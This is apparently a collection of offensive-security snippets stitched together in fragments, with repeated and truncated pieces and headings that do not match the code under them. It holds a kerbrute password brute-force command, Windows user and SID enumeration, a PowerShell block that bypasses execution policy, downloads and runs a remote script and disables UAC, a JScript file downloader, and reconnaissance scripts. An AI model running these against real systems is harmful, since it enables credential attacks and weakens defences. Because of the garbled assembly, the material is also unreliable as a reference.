With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
wmic useraccount where name='test_user' get sid | |
wmic useraccount where (name='test_user' and domain=′corp.com′) get sid | |
wmic useraccount where sid='S-1-3-12-12451234567-1234567890-1234567-1434' get name |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#Bypass Execution Policy | |
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force | |
#Install boxstarter | |
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://boxstarter.org/bootstrapper.ps1')); Get-Boxstarter -Force | |
#Disable UAC | |
Disable-UAC | |
#Disanle Micrsoft Update |
MITRE ATT&CK | |
------------ | |
MITRE ATT&CK® : | |
https://attack.mitre.org | |
Getting Started with ATT&CK: Detection and Analytics : | |
https://medium.com/mitre-attack/getting-started-with-attack-detection-a8e49e4960d0 | |
Getting Started with ATT&CK: Adversary Emulation and Red Teaming : | |
https://medium.com/mitre-attack/getting-started-with-attack-red-29f074ccf7e3 |
import os | |
import struct | |
import sys | |
#Single Byte XOR | |
def xor(data,key): | |
translated = ""; | |
for ch in data: | |
translated += chr(ord(ch) ^ key) | |
return translated |
import base64 | |
chr_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" | |
non_chr_set = "0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz=" | |
encoded = "G6JgP6w=" | |
re_encoded = "" | |
for en_chr in encoded: | |
re_encoded += en_chr.replace(en_chr,chr_set[non_chr_set.find(en_chr)]) |
import base64 | |
plain_text = "One" | |
encoded = base64.b64encode(plain_text) | |
print encoded | |
decoded = base64.b64decode(encoded) | |
print decoded |
certstream | grep -E "\.org\.com$" | |
curl -s https://certspotter.com/api/v0/certs?domain=org.com | jq |
from shodan import Shodan | |
import ipaddress | |
import pprint | |
import json | |
pp = pprint.PrettyPrinter(indent=2) | |
api = Shodan('') | |
net = ipaddress.ip_network('') | |
for xIp in net.hosts(): |
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); | |
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); | |
WinHttpReq.Send(); | |
BinStream = new ActiveXObject("ADODB.Stream"); | |
BinStream.Type = 1; | |
BinStream.Open(); | |
BinStream.Write(WinHttpReq.ResponseBody); | |
BinStream.SaveToFile("c:\\Windows\\Temp\\file.txt"); |